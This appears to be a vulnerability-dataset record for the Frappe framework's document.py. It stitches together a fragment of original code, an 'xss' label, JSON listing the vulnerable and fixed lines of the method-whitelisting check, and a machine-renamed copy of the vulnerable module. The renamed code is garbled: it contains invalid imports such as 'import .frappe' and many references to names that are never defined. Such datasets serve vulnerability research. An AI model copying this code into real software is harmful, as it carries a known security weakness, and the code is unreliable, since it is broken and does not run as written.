return self.get("__onload", frappe._dict())
return self.get('__onload')[key]
def queue_action(self, action, **kwargs):
"""Run an action in background. If the action has an inner function,
like _submit for submit, it will call that instead"""
# call _submit instead of submit, so you can override submit to call
# run_delayed based on some action
# See: Stock Reconciliation
from frappe.utils.background_jobs import enqueue
if hasattr(self, '_' + action):
action = '_' + action
if file_lock.lock_exists(self.get_signature()):
frappe.throw(_('This document is currently queued for execution. Please try again'),
title=_('Document Queued'))
self.lock()
enqueue('frappe.model.document.execute_action', doctype=self.doctype, name=self.name,
action=action, **kwargs)
def lock(self, timeout=None):
"""Creates a lock file for the given document. If timeout is set,
it will retry every 1 second for acquiring the lock again
:param timeout: Timeout in seconds, default 0"""
signature = self.get_signature()
if file_lock.lock_exists(signature):
lock_exists = True
if timeout:
for i in range(timeout):
time.sleep(1)
if not file_lock.lock_exists(signature):
lock_exists = False
break
if lock_exists:
raise frappe.DocumentLockedError
file_lock.create_lock(signature)
def unlock(self):
"""Delete the lock file for this document"""
file_lock.delete_lock(self.get_signature())
# validation helpers
def validate_from_to_dates(self, from_date_field, to_date_field):
"""
Generic validation to verify date sequence
"""
if date_diff(self.get(to_date_field), self.get(from_date_field)) < 0:
frappe.throw(_('{0} must be after {1}').format(
frappe.bold(self.meta.get_label(to_date_field)),
frappe.bold(self.meta.get_label(from_date_field)),
), frappe.exceptions.InvalidDates)
def get_assigned_users(self):
assignments = frappe.get_all('ToDo',
fields=['owner'],
filters={
'reference_type': self.doctype,
'reference_name': self.name,
'status': ('!=', 'Cancelled'),
})
users = set([assignment.owner for assignment in assignments])
return users
def add_tag(self, tag):
"""Add a Tag to this document"""
from frappe.desk.doctype.tag.tag import DocTags
DocTags(self.doctype).add(self.name, tag)
def get_tags(self):
"""Return a list of Tags attached to this document"""
from frappe.desk.doctype.tag.tag import DocTags
return DocTags(self.doctype).get_tags(self.name).split(",")[1:]
def execute_action(doctype, name, action, **kwargs):
"""Execute an action on a document (called by background worker)"""
doc = frappe.get_doc(doctype, name)
doc.unlock()
try:
getattr(doc, action)(**kwargs)
except Exception:
frappe.db.rollback()
# add a comment (?)
if frappe.local.message_log:
msg = json.loads(frappe.local.message_log[-1]).get('message')
else:
msg = '<pre><code>' + frappe.get_traceback() + '</pre></code>'
doc.add_comment('Comment', _('Action Failed') + '<br><br>' + msg)
doc.notify_update()
| xss | {
"code": [
"from frappe import _, msgprint",
"\tdef whitelist(f):",
"\t\tf.whitelisted = True",
"\t\treturn f",
"\tdef is_whitelisted(self, method):",
"\t\tfn = getattr(self, method, None)",
"\t\t\traise NotFound(\"Method {0} not found\".format(method))",
"\t\telif not getattr(fn, \"whitelisted\", False):",
"\t\t\traise Forbidden(\"Method {0} not whitelisted\".format(method))"
],
"line_no": [
7,
129,
131,
132,
1151,
1152,
1154,
1155,
1156
]
} | {
"code": [
"from frappe import _, msgprint, is_whitelisted",
"\tdef whitelist(fn):",
"\t\tfrappe.whitelist()(fn)",
"\t\treturn fn",
"\tdef is_whitelisted(self, method_name):",
"\t\tmethod = getattr(self, method_name, None)",
"\t\t\traise NotFound(\"Method {0} not found\".format(method_name))",
"\t\tis_whitelisted(getattr(method, '__func__', method))"
],
"line_no": [
7,
129,
131,
132,
1151,
1152,
1154,
1156
]
} |
from __future__ import unicode_literals, print_function
import .frappe
import time
from frappe import _, msgprint
from frappe.utils import .flt, cstr, now, get_datetime_str, file_lock, date_diff
from frappe.model.base_document import BaseDocument, get_controller
from frappe.model.naming import .set_new_name
from six import iteritems, string_types
from werkzeug.exceptions import NotFound, Forbidden
import hashlib, json
from frappe.model import optional_fields, VAR_81
from frappe.model.workflow import .validate_workflow
from frappe.model.workflow import set_workflow_state_on_action
from frappe.utils.global_search import update_global_search
from frappe.integrations.doctype.webhook import run_webhooks
from frappe.desk.form.document_follow import .follow_document
from frappe.core.doctype.server_script.server_script_utils import run_server_script_for_doc_event
def FUNC_0(*VAR_0, **VAR_1):
if VAR_0:
if isinstance(VAR_0[0], BaseDocument):
return VAR_0[0]
elif isinstance(VAR_0[0], string_types):
VAR_2 = VAR_0[0]
elif isinstance(VAR_0[0], dict):
VAR_1 = VAR_0[0]
else:
raise ValueError('First non keyword argument must be a string or dict')
if len(VAR_0) < 2 and VAR_1:
if 'doctype' in VAR_1:
VAR_2 = VAR_1['doctype']
else:
raise ValueError('"doctype" is a required key')
VAR_5 = get_controller(VAR_2)
if VAR_5:
return VAR_5(*VAR_0, **VAR_1)
raise ImportError(VAR_2)
class CLASS_0(BaseDocument):
def __init__(self, *VAR_0, **VAR_1):
self.doctype = self.name = None
self._default_new_docs = {}
self.flags = frappe._dict()
if VAR_0 and VAR_0[0] and isinstance(VAR_0[0], string_types):
if len(VAR_0)==1:
self.doctype = self.name = VAR_0[0]
else:
self.doctype = VAR_0[0]
if isinstance(VAR_0[1], dict):
self.name = frappe.db.get_value(VAR_0[0], VAR_0[1], "name")
if self.name is None:
frappe.throw(_("{0} {1} not found").format(_(VAR_0[0]), VAR_0[1]),
frappe.DoesNotExistError)
else:
self.name = VAR_0[1]
if 'for_update' in VAR_1:
self.flags.for_update = VAR_1.get('for_update')
self.load_from_db()
return
if VAR_0 and VAR_0[0] and isinstance(VAR_0[0], dict):
VAR_1 = VAR_0[0]
if VAR_1:
super(CLASS_0, self).__init__(VAR_1)
self.init_valid_columns()
else:
raise ValueError('Illegal arguments')
@staticmethod
def FUNC_2(VAR_6):
VAR_6.whitelisted = True
return VAR_6
def FUNC_3(self):
self.load_from_db()
def FUNC_4(self):
if not getattr(self, "_metaclass", False) and self.meta.issingle:
VAR_80 = frappe.db.get_singles_dict(self.doctype)
if not VAR_80:
single_doc = frappe.new_doc(self.doctype).as_dict()
VAR_80["name"] = self.doctype
del VAR_80["__islocal"]
super(CLASS_0, self).__init__(VAR_80)
self.init_valid_columns()
self._fix_numeric_types()
else:
VAR_21 = frappe.db.get_value(self.doctype, self.name, "*", as_dict=1, for_update=self.flags.for_update)
if not VAR_21:
frappe.throw(_("{0} {1} not found").format(_(self.doctype), self.name), frappe.DoesNotExistError)
super(CLASS_0, self).__init__(VAR_21)
if self.name=="DocType" and self.doctype=="DocType":
from frappe.model.meta import DOCTYPE_TABLE_FIELDS
VAR_81 = DOCTYPE_TABLE_FIELDS
else:
VAR_81 = self.meta.get_table_fields()
for VAR_19 in VAR_81:
VAR_50 = frappe.db.get_values(VAR_19.options,
{"parent": self.name, "parenttype": self.doctype, "parentfield": VAR_19.fieldname},
"*", as_dict=True, order_by="idx asc")
if VAR_50:
self.set(VAR_19.fieldname, VAR_50)
else:
self.set(VAR_19.fieldname, [])
if hasattr(self, "__setup__"):
self.__setup__()
def FUNC_5(self):
if not getattr(self, "latest", None):
self.latest = frappe.get_doc(self.doctype, self.name)
return self.latest
def FUNC_6(self, VAR_7='read', VAR_8=None):
if not self.has_permission(VAR_7):
self.raise_no_permission_to(VAR_8 or VAR_7)
def FUNC_7(self, VAR_7="read", VAR_9=False):
if self.flags.ignore_permissions:
return True
return frappe.has_permission(self.doctype, VAR_7, self, VAR_9=verbose)
def FUNC_8(self, VAR_10):
frappe.flags.error_message = _('Insufficient Permission for {0}').format(self.doctype)
raise frappe.PermissionError
def FUNC_9(self, VAR_11=None, VAR_12=None, VAR_13=False,
VAR_14=None, VAR_15=None, VAR_16=True):
if self.flags.in_print:
return
self.flags.notifications_executed = []
if VAR_11!=None:
self.flags.ignore_permissions = VAR_11
if VAR_12!=None:
self.flags.ignore_links = VAR_12
if VAR_14!=None:
self.flags.ignore_mandatory = VAR_14
self.set("__islocal", True)
self.check_permission("create")
self._set_defaults()
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.run_method("before_insert")
self._validate_links()
self.set_new_name(VAR_15=set_name, VAR_16=set_child_names)
self.set_parent_in_children()
self.validate_higher_perm_levels()
self.flags.in_insert = True
self.run_before_save_methods()
self._validate()
self.set_docstatus()
self.flags.in_insert = False
if getattr(self.meta, "issingle", 0):
self.update_single(self.get_valid_dict())
else:
try:
self.db_insert()
except frappe.DuplicateEntryError as e:
if not VAR_13:
raise e
for VAR_21 in self.get_all_children():
VAR_21.db_insert()
self.run_method("after_insert")
self.flags.in_insert = True
if self.get("amended_from"):
self.copy_attachments_from_amended_from()
self.flags.update_log_for_doc_creation = True
self.run_post_save_methods()
self.flags.in_insert = False
if hasattr(self, "__islocal"):
delattr(self, "__islocal")
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
if not (frappe.flags.in_migrate or frappe.local.flags.in_install or frappe.flags.in_setup_wizard):
follow_document(self.doctype, self.name, frappe.session.user)
return self
def FUNC_10(self, *VAR_0, **VAR_1):
return self._save(*VAR_0, **VAR_1)
def FUNC_11(self, VAR_11=None, VAR_17=None):
if self.flags.in_print:
return
self.flags.notifications_executed = []
if VAR_11!=None:
self.flags.ignore_permissions = VAR_11
self.flags.ignore_version = frappe.flags.in_test if VAR_17 is None else VAR_17
if self.get("__islocal") or not self.get("name"):
self.insert()
return
self.check_permission("write", "save")
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.set_parent_in_children()
self.set_name_in_children()
self.validate_higher_perm_levels()
self._validate_links()
self.run_before_save_methods()
if self._action != "cancel":
self._validate()
if self._action == "update_after_submit":
self.validate_update_after_submit()
self.set_docstatus()
if self.meta.issingle:
self.update_single(self.get_valid_dict())
else:
self.db_update()
self.update_children()
self.run_post_save_methods()
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
return self
def FUNC_12(self):
from frappe.desk.form.load import get_attachments
for attach_item in get_attachments(self.doctype, self.amended_from):
VAR_82 = frappe.get_doc({
"doctype": "File",
"file_url": attach_item.file_url,
"file_name": attach_item.file_name,
"attached_to_name": self.name,
"attached_to_doctype": self.doctype,
"folder": "Home/Attachments"})
VAR_82.save()
def FUNC_13(self):
for VAR_19 in self.meta.get_table_fields():
self.update_child_table(VAR_19.fieldname, VAR_19)
def FUNC_14(self, VAR_18, VAR_19=None):
VAR_48 = []
if not VAR_19:
VAR_19 = self.meta.get_field(VAR_18)
for VAR_21 in self.get(VAR_19.fieldname):
VAR_21.db_update()
VAR_48.append(VAR_21.name)
if VAR_19.options in (self.flags.ignore_children_type or []):
return
if VAR_48:
VAR_83 = frappe.db.sql("""select VAR_3 from `tab{0}` where parent=%s
and VAR_24=%s and VAR_34=%s
and VAR_3 not in ({1})""".format(VAR_19.options, ','.join(['%s'] * len(VAR_48))),
[self.name, self.doctype, VAR_18] + VAR_48)
if len(VAR_83) > 0:
frappe.db.sql("""delete from `tab{0}` where VAR_3 in ({1})""".format(VAR_19.options,
','.join(['%s'] * len(VAR_83))), tuple(row[0] for row in VAR_83))
else:
frappe.db.sql("""delete from `tab{0}` where parent=%s
and VAR_24=%s and VAR_34=%s""".format(VAR_19.options),
(self.name, self.doctype, VAR_18))
def FUNC_15(self):
return getattr(self, '_doc_before_save', None)
def FUNC_16(self, VAR_18):
VAR_49 = self.get_doc_before_save()
return VAR_49.get(VAR_18)!=self.get(VAR_18) if VAR_49 else True
def FUNC_17(self, VAR_20=False, VAR_15=None, VAR_16=True):
if self.flags.name_set and not VAR_20:
return
if self.get("__newname"):
self.name = self.get("__newname")
self.flags.name_set = True
return
if VAR_15:
self.name = VAR_15
else:
FUNC_17(self)
if VAR_16:
for VAR_21 in self.get_all_children():
FUNC_17(VAR_21)
self.flags.name_set = True
def FUNC_18(self):
return self.get(self.meta.get_title_field())
def FUNC_19(self):
def FUNC_80():
VAR_84 = self.as_dict()
for VAR_43, VAR_26 in iteritems(VAR_84):
if VAR_26==None:
VAR_84[VAR_43] = ""
return VAR_84
if self.meta.get("title_field")=="title":
VAR_19 = self.meta.get_field(self.meta.title_field)
if VAR_19.options:
self.set(VAR_19.fieldname, VAR_19.options.format(**FUNC_80()))
elif self.is_new() and not self.get(VAR_19.fieldname) and VAR_19.default:
self.set(VAR_19.fieldname, VAR_19.default.format(**FUNC_80()))
def FUNC_20(self, VAR_21):
frappe.db.sql("""delete from `tabSingles` where VAR_2=%s""", self.doctype)
for field, VAR_26 in iteritems(VAR_21):
if field != "doctype":
frappe.db.sql("""insert into `tabSingles` (VAR_2, field, VAR_26)
VAR_84 (%s, %s, %s)""", (self.doctype, field, VAR_26))
if self.doctype in frappe.db.value_cache:
del frappe.db.value_cache[self.doctype]
def FUNC_21(self):
self._original_modified = self.modified
self.modified = now()
self.modified_by = frappe.session.user
if not self.creation:
self.creation = self.modified
if not self.owner:
self.owner = self.modified_by
for VAR_21 in self.get_all_children():
VAR_21.modified = self.modified
VAR_21.modified_by = self.modified_by
if not VAR_21.owner:
VAR_21.owner = self.owner
if not VAR_21.creation:
VAR_21.creation = self.creation
frappe.flags.currently_saving.append((self.doctype, self.name))
def FUNC_22(self):
if self.docstatus==None:
self.docstatus=0
for VAR_21 in self.get_all_children():
VAR_21.docstatus = self.docstatus
def FUNC_23(self):
self._validate_mandatory()
self._validate_data_fields()
self._validate_selects()
self._validate_non_negative()
self._validate_length()
self._extract_images_from_text_editor()
self._sanitize_content()
self._save_passwords()
self.validate_workflow()
VAR_50 = self.get_all_children()
for VAR_21 in VAR_50:
VAR_21._validate_data_fields()
VAR_21._validate_selects()
VAR_21._validate_non_negative()
VAR_21._validate_length()
VAR_21._extract_images_from_text_editor()
VAR_21._sanitize_content()
VAR_21._save_passwords()
if self.is_new():
for VAR_18 in optional_fields:
self.set(VAR_18, None)
else:
self.validate_set_only_once()
def FUNC_24(self):
def FUNC_81(VAR_19):
if self.parentfield:
return "{} {} #{}: {} {}".format(frappe.bold(_(self.doctype)),
_("Row"), self.idx, _("Value cannot be negative for"), frappe.bold(_(VAR_19.label)))
else:
return _("Value cannot be negative for {0}: {1}").format(_(VAR_19.parent), frappe.bold(_(VAR_19.label)))
for VAR_19 in self.meta.get('fields', {'non_negative': ('=', 1),
'fieldtype': ('in', ['Int', 'Float', 'Currency'])}):
if flt(self.get(VAR_19.fieldname)) < 0:
VAR_87 = FUNC_81(VAR_19)
frappe.throw(VAR_87, frappe.NonNegativeError, title=_("Negative Value"))
def FUNC_25(self):
if frappe.flags.in_install == 'frappe': return
VAR_51 = self.meta.get_workflow()
if VAR_51:
FUNC_25(self)
if not self._action == 'save':
set_workflow_state_on_action(self, VAR_51, self._action)
def FUNC_26(self):
VAR_52 = self.meta.get_set_only_once_fields()
if VAR_52 and self._doc_before_save:
for field in VAR_52:
VAR_97 = False
VAR_26 = self.get(field.fieldname)
VAR_53 = self._doc_before_save.get(field.fieldname)
if field.fieldtype in VAR_81:
VAR_97 = not self.is_child_table_same(field.fieldname)
elif field.fieldtype in ('Date', 'Datetime', 'Time'):
VAR_97 = str(VAR_26) != str(VAR_53)
else:
VAR_97 = VAR_26 != VAR_53
if VAR_97:
frappe.throw(_("Value cannot be changed for {0}").format(self.meta.get_label(field.fieldname)),
frappe.CannotChangeConstantError)
return False
def FUNC_27(self, VAR_18):
VAR_26 = self.get(VAR_18)
VAR_53 = self._doc_before_save.get(VAR_18)
VAR_54 = True
if len(VAR_53) != len(VAR_26):
VAR_54 = False
else:
for i, VAR_21 in enumerate(VAR_53):
VAR_98 = VAR_26[i].as_dict(convert_dates_to_str = True)
VAR_99 = VAR_21.as_dict(convert_dates_to_str = True)
for VAR_43 in ('modified', 'modified_by', 'creation'):
del VAR_98[VAR_43]
del VAR_99[VAR_43]
if VAR_99 != VAR_98:
VAR_54 = False
break
return VAR_54
def FUNC_28(self):
if frappe.session.user == "Administrator":
return
VAR_55 = False
VAR_56 = self.meta.fields.copy()
for table_field in self.meta.get_table_fields():
VAR_56 += frappe.get_meta(table_field.options).fields or []
for VAR_19 in VAR_56:
if VAR_19.permlevel > 0:
VAR_55 = True
break
if not VAR_55:
return
VAR_57 = self.get_permlevel_access('read')
for VAR_19 in self.meta.fields:
if VAR_19.permlevel and not VAR_19.permlevel in VAR_57:
self.set(VAR_19.fieldname, None)
for table_field in self.meta.get_table_fields():
for VAR_19 in frappe.get_meta(table_field.options).fields or []:
if VAR_19.permlevel and not VAR_19.permlevel in VAR_57:
for child in self.get(table_field.fieldname) or []:
child.set(VAR_19.fieldname, None)
def FUNC_29(self):
if self.flags.ignore_permissions or frappe.flags.in_install:
return
if frappe.session.user == "Administrator":
return
VAR_57 = self.get_permlevel_access()
VAR_58 = self.meta.get_high_permlevel_fields()
if VAR_58:
self.reset_values_if_no_permlevel_access(VAR_57, VAR_58)
if self.is_new(): return
for VAR_19 in self.meta.get_table_fields():
VAR_58 = frappe.get_meta(VAR_19.options).get_high_permlevel_fields()
if VAR_58:
for VAR_21 in self.get(VAR_19.fieldname):
VAR_21.reset_values_if_no_permlevel_access(VAR_57, VAR_58)
def FUNC_30(self, VAR_22='write'):
if not hasattr(self, "_has_access_to"):
self._has_access_to = {}
self._has_access_to[VAR_22] = []
VAR_59 = frappe.get_roles()
for perm in self.get_permissions():
if perm.role in VAR_59 and perm.get(VAR_22):
if perm.permlevel not in self._has_access_to[VAR_22]:
self._has_access_to[VAR_22].append(perm.permlevel)
return self._has_access_to[VAR_22]
def FUNC_31(self, VAR_18, VAR_19=None, VAR_22='read'):
if not VAR_19:
VAR_19 = self.meta.get_field(VAR_18)
return VAR_19.permlevel in self.get_permlevel_access(VAR_22)
def FUNC_32(self):
if self.meta.istable:
permissions = frappe.get_meta(self.parenttype).permissions
else:
VAR_85 = self.meta.permissions
return VAR_85
def FUNC_33(self):
if frappe.flags.in_import:
return
VAR_60 = frappe.new_doc(self.doctype, as_dict=True)
self.update_if_missing(VAR_60)
for VAR_19 in self.meta.get_table_fields():
VAR_60 = frappe.new_doc(VAR_19.options, as_dict=True)
VAR_26 = self.get(VAR_19.fieldname)
if isinstance(VAR_26, list):
for VAR_21 in VAR_26:
VAR_21.update_if_missing(VAR_60)
def FUNC_34(self):
VAR_61 = False
self._action = "save"
if not self.get('__islocal'):
if self.meta.issingle:
VAR_100 = frappe.db.sql("""select VAR_26 from tabSingles
where VAR_2=%s and field='modified' for update""", self.doctype)
VAR_100 = VAR_100 and VAR_100[0][0]
if VAR_100 and VAR_100 != cstr(self._original_modified):
VAR_61 = True
else:
VAR_101 = frappe.db.sql("""select VAR_100, VAR_23 from `tab{0}`
where VAR_3 = %s for update""".format(self.doctype), self.name, as_dict=True)
if not VAR_101:
frappe.throw(_("Record does not exist"))
else:
VAR_101 = tmp[0]
VAR_100 = cstr(VAR_101.modified)
if VAR_100 and VAR_100 != cstr(self._original_modified):
VAR_61 = True
self.check_docstatus_transition(VAR_101.docstatus)
if VAR_61:
frappe.msgprint(_("Error: CLASS_0 has been VAR_100 after you have opened it") \
+ (" (%s, %s). " % (VAR_100, self.modified)) \
+ _("Please refresh to get the latest document."),
VAR_33=frappe.TimestampMismatchError)
else:
self.check_docstatus_transition(0)
def FUNC_35(self, VAR_23):
if not self.docstatus:
self.docstatus = 0
if VAR_23==0:
if self.docstatus==0:
self._action = "save"
elif self.docstatus==1:
self._action = "submit"
self.check_permission("submit")
else:
raise frappe.DocstatusTransitionError(_("Cannot change VAR_23 from 0 to 2"))
elif VAR_23==1:
if self.docstatus==1:
self._action = "update_after_submit"
self.check_permission("submit")
elif self.docstatus==2:
self._action = "cancel"
self.check_permission("cancel")
else:
raise frappe.DocstatusTransitionError(_("Cannot change VAR_23 from 1 to 0"))
elif VAR_23==2:
raise frappe.ValidationError(_("Cannot edit cancelled document"))
def FUNC_36(self):
for VAR_21 in self.get_all_children():
VAR_21.parent = self.name
VAR_21.parenttype = self.doctype
def FUNC_37(self):
for VAR_21 in self.get_all_children():
if not VAR_21.name:
FUNC_17(VAR_21)
def FUNC_38(self):
if self.flags.ignore_validate_update_after_submit:
return
self._validate_update_after_submit()
for VAR_21 in self.get_all_children():
if VAR_21.is_new() and self.meta.get_field(VAR_21.parentfield).allow_on_submit:
continue
VAR_21._validate_update_after_submit()
def FUNC_39(self):
if self.flags.ignore_mandatory:
return
VAR_62 = self._get_missing_mandatory_fields()
for VAR_21 in self.get_all_children():
VAR_62.extend(VAR_21._get_missing_mandatory_fields())
if not VAR_62:
return
for VAR_18, VAR_87 in VAR_62:
msgprint(VAR_87)
if frappe.flags.print_messages:
print(self.as_json().encode("utf-8"))
raise frappe.MandatoryError('[{VAR_2}, {VAR_3}]: {fields}'.format(
fields=", ".join((each[0] for each in VAR_62)),
VAR_2=self.doctype,
VAR_3=self.name))
def FUNC_40(self):
if self.flags.ignore_links or self._action == "cancel":
return
VAR_63, VAR_64 = self.get_invalid_links()
for VAR_21 in self.get_all_children():
VAR_86 = VAR_21.get_invalid_links(is_submittable=self.meta.is_submittable)
VAR_63.extend(VAR_86[0])
VAR_64.extend(VAR_86[1])
if VAR_63:
VAR_87 = ", ".join((each[2] for each in VAR_63))
frappe.throw(_("Could not find {0}").format(VAR_87),
frappe.LinkValidationError)
if VAR_64:
VAR_87 = ", ".join((each[2] for each in VAR_64))
frappe.throw(_("Cannot link cancelled document: {0}").format(VAR_87),
frappe.CancelledLinkError)
def FUNC_41(self, VAR_24=None):
VAR_65 = []
for VAR_19 in self.meta.get("fields", {"fieldtype": ['in', VAR_81]}):
if VAR_24:
if VAR_19.options==VAR_24:
return self.get(VAR_19.fieldname)
VAR_26 = self.get(VAR_19.fieldname)
if isinstance(VAR_26, list):
VAR_65.extend(VAR_26)
return VAR_65
def FUNC_42(self, VAR_25, *VAR_0, **VAR_1):
if "flags" in VAR_1:
del VAR_1["flags"]
if hasattr(self, VAR_25) and hasattr(getattr(self, VAR_25), "__call__"):
VAR_72 = lambda self, *VAR_0, **VAR_1: getattr(self, VAR_25)(*VAR_0, **VAR_1)
else:
VAR_72 = lambda self, *VAR_0, **VAR_1: None
VAR_72.__name__ = str(VAR_25)
VAR_66 = CLASS_0.hook(VAR_72)(self, *VAR_0, **VAR_1)
self.run_notifications(VAR_25)
run_webhooks(self, VAR_25)
run_server_script_for_doc_event(self, VAR_25)
return VAR_66
def FUNC_43(self, VAR_25, *VAR_0, **VAR_1):
return self.run_method(VAR_25, *VAR_0, **VAR_1)
def FUNC_44(self, VAR_25):
if (frappe.flags.in_import and frappe.flags.mute_emails) or frappe.flags.in_patch or frappe.flags.in_install:
return
if self.flags.notifications_executed==None:
self.flags.notifications_executed = []
from frappe.email.doctype.notification.notification import evaluate_alert
if self.flags.notifications == None:
VAR_88 = frappe.cache().hget('notifications', self.doctype)
if VAR_88==None:
VAR_88 = frappe.get_all('Notification', fields=['name', 'event', 'method'],
filters={'enabled': 1, 'document_type': self.doctype})
frappe.cache().hset('notifications', self.doctype, VAR_88)
self.flags.notifications = VAR_88
if not self.flags.notifications:
return
def FUNC_82(VAR_67):
if not VAR_67.name in self.flags.notifications_executed:
evaluate_alert(self, VAR_67.name, VAR_67.event)
self.flags.notifications_executed.append(VAR_67.name)
VAR_68 = {
"on_update": "Save",
"after_insert": "New",
"on_submit": "Submit",
"on_cancel": "Cancel"
}
if not self.flags.in_insert:
VAR_68['on_change'] = 'Value Change'
for VAR_67 in self.flags.notifications:
VAR_89 = VAR_68.get(VAR_25, None)
if VAR_89 and VAR_67.event == VAR_89:
FUNC_82(VAR_67)
elif VAR_67.event=='Method' and VAR_25 == VAR_67.method:
FUNC_82(VAR_67)
@FUNC_2.__func__
def FUNC_45(self):
self.docstatus = 1
self.save()
@FUNC_2.__func__
def FUNC_46(self):
self.docstatus = 2
self.save()
@FUNC_2.__func__
def FUNC_47(self):
self._submit()
@FUNC_2.__func__
def FUNC_48(self):
self._cancel()
def FUNC_49(self, VAR_11=False):
frappe.delete_doc(self.doctype, self.name, VAR_11 = ignore_permissions, flags=self.flags)
def FUNC_50(self):
self.load_doc_before_save()
self.reset_seen()
if self._action in ("save", "submit"):
self.run_method("before_validate")
if self.flags.ignore_validate:
return
if self._action=="save":
self.run_method("validate")
self.run_method("before_save")
elif self._action=="submit":
self.run_method("validate")
self.run_method("before_submit")
elif self._action=="cancel":
self.run_method("before_cancel")
elif self._action=="update_after_submit":
self.run_method("before_update_after_submit")
self.set_title_field()
def FUNC_51(self):
self._doc_before_save = None
if not self.is_new():
try:
self._doc_before_save = frappe.get_doc(self.doctype, self.name)
except frappe.DoesNotExistError:
self._doc_before_save = None
frappe.clear_last_message()
def FUNC_52(self):
VAR_69 = self.get_doc_before_save()
if self._action=="save":
self.run_method("on_update")
elif self._action=="submit":
self.run_method("on_update")
self.run_method("on_submit")
elif self._action=="cancel":
self.run_method("on_cancel")
self.check_no_back_links_exist()
elif self._action=="update_after_submit":
self.run_method("on_update_after_submit")
self.clear_cache()
self.notify_update()
update_global_search(self)
self.save_version()
self.run_method('on_change')
if (self.doctype, self.name) in frappe.flags.currently_saving:
frappe.flags.currently_saving.remove((self.doctype, self.name))
self.latest = None
def FUNC_53(self):
frappe.clear_document_cache(self.doctype, self.name)
def FUNC_54(self):
if getattr(self.meta, 'track_seen', False):
frappe.db.set_value(self.doctype, self.name, "_seen", json.dumps([frappe.session.user]), VAR_27=False)
def FUNC_55(self):
if frappe.flags.in_patch: return
frappe.publish_realtime("doc_update", {"modified": self.modified, "doctype": self.doctype, "name": self.name},
VAR_2=self.doctype, docname=self.name, after_commit=True)
if not self.meta.get("read_only") and not self.meta.get("issingle") and \
not self.meta.get("istable"):
VAR_90 = {
"doctype": self.doctype,
"name": self.name,
"user": frappe.session.user
}
frappe.publish_realtime("list_update", VAR_90, after_commit=True)
def FUNC_56(self, VAR_18, VAR_26=None, VAR_27=True, VAR_28=False, VAR_29=False):
if isinstance(VAR_18, dict):
self.update(VAR_18)
else:
self.set(VAR_18, VAR_26)
if VAR_27 and (self.doctype, self.name) not in frappe.flags.currently_saving:
self.set("modified", now())
self.set("modified_by", frappe.session.user)
self.load_doc_before_save()
self.run_method('before_change')
frappe.db.set_value(self.doctype, self.name, VAR_18, VAR_26,
self.modified, self.modified_by, VAR_27=update_modified)
self.run_method('on_change')
if VAR_28:
self.notify_update()
self.clear_cache()
if VAR_29:
frappe.db.commit()
def FUNC_57(self, VAR_18):
return frappe.db.get_value(self.doctype, self.name, VAR_18)
def FUNC_58(self):
from frappe.model.delete_doc import check_if_doc_is_linked, check_if_doc_is_dynamically_linked
if not self.flags.ignore_links:
check_if_doc_is_linked(self, VAR_25="Cancel")
check_if_doc_is_dynamically_linked(self, VAR_25="Cancel")
def FUNC_59(self):
if (not getattr(self.meta, 'track_changes', False)
or self.doctype == 'Version'
or self.flags.ignore_version
or frappe.flags.in_install
or (not self._doc_before_save and frappe.flags.in_patch)):
return
VAR_70 = frappe.new_doc('Version')
if not self._doc_before_save:
VAR_70.for_insert(self)
VAR_70.insert(VAR_11=True)
elif VAR_70.set_diff(self._doc_before_save, self):
VAR_70.insert(VAR_11=True)
if not frappe.flags.in_migrate:
follow_document(self.doctype, self.name, frappe.session.user)
@staticmethod
def FUNC_60(VAR_6):
def FUNC_83(self, VAR_71):
if isinstance(VAR_71, dict):
if not self.get("_return_value"):
self._return_value = {}
self._return_value.update(VAR_71)
else:
self._return_value = VAR_71 or self.get("_return_value")
def FUNC_84(VAR_72, *VAR_73):
def FUNC_86(self, VAR_25, *VAR_0, **VAR_1):
FUNC_83(self, VAR_72(self, *VAR_0, **VAR_1))
for VAR_6 in VAR_73:
FUNC_83(self, VAR_6(self, VAR_25, *VAR_0, **VAR_1))
return self._return_value
return FUNC_86
def FUNC_85(self, *VAR_0, **VAR_1):
VAR_73 = []
VAR_25 = VAR_6.__name__
VAR_91 = frappe.get_doc_hooks()
for handler in VAR_91.get(self.doctype, {}).get(VAR_25, []) \
+ VAR_91.get("*", {}).get(VAR_25, []):
VAR_73.append(frappe.get_attr(handler))
VAR_92 = FUNC_84(VAR_6, *VAR_73)
return VAR_92(self, VAR_25, *VAR_0, **VAR_1)
return FUNC_85
def FUNC_61(self, VAR_25):
VAR_72 = getattr(self, VAR_25, None)
if not VAR_72:
raise NotFound("Method {0} not found".format(VAR_25))
elif not getattr(VAR_72, "whitelisted", False):
raise Forbidden("Method {0} not whitelisted".format(VAR_25))
def FUNC_62(self, VAR_18, VAR_30, VAR_31, VAR_32=None, VAR_33=None):
VAR_74 = {
"in": _("one of"),
"not in": _("none of"),
"^": _("beginning with"),
}
if not VAR_32:
doc = self
VAR_75 = VAR_32.get_value(VAR_18)
VAR_19 = VAR_32.meta.get_field(VAR_18)
VAR_31 = VAR_32.cast(VAR_31, VAR_19)
if not frappe.compare(VAR_75, VAR_30, VAR_31):
VAR_93 = VAR_32.meta.get_label(VAR_18)
VAR_94 = VAR_74.get(VAR_30, condition)
if VAR_32.parentfield:
VAR_87 = _("Incorrect VAR_26 in row {0}: {1} must be {2} {3}").format(VAR_32.idx, VAR_93, VAR_94, VAR_31)
else:
VAR_87 = _("Incorrect VAR_26: {0} must be {1} {2}").format(VAR_93, VAR_94, VAR_31)
msgprint(VAR_87, VAR_33=raise_exception or True)
def FUNC_63(self, VAR_34, VAR_33=None):
if not (isinstance(self.get(VAR_34), list) and len(self.get(VAR_34)) > 0):
VAR_93 = self.meta.get_label(VAR_34)
frappe.throw(_("Table {0} cannot be empty").format(VAR_93), VAR_33 or frappe.EmptyTableError)
def FUNC_64(self, VAR_32, VAR_35=None):
if not VAR_35:
fieldnames = (VAR_19.fieldname for VAR_19 in
VAR_32.meta.get("fields", {"fieldtype": ["in", ["Currency", "Float", "Percent"]]}))
for VAR_18 in VAR_35:
VAR_32.set(VAR_18, flt(VAR_32.get(VAR_18), self.precision(VAR_18, VAR_32.parentfield)))
def FUNC_65(self):
return "/app/Form/{VAR_2}/{VAR_3}".format(VAR_2=self.doctype, VAR_3=self.name)
def FUNC_66(self, VAR_36='Comment', VAR_37=None, VAR_38=None, VAR_39=None, VAR_40=None, VAR_41=None):
VAR_66 = frappe.get_doc({
"doctype":"Comment",
'comment_type': VAR_36,
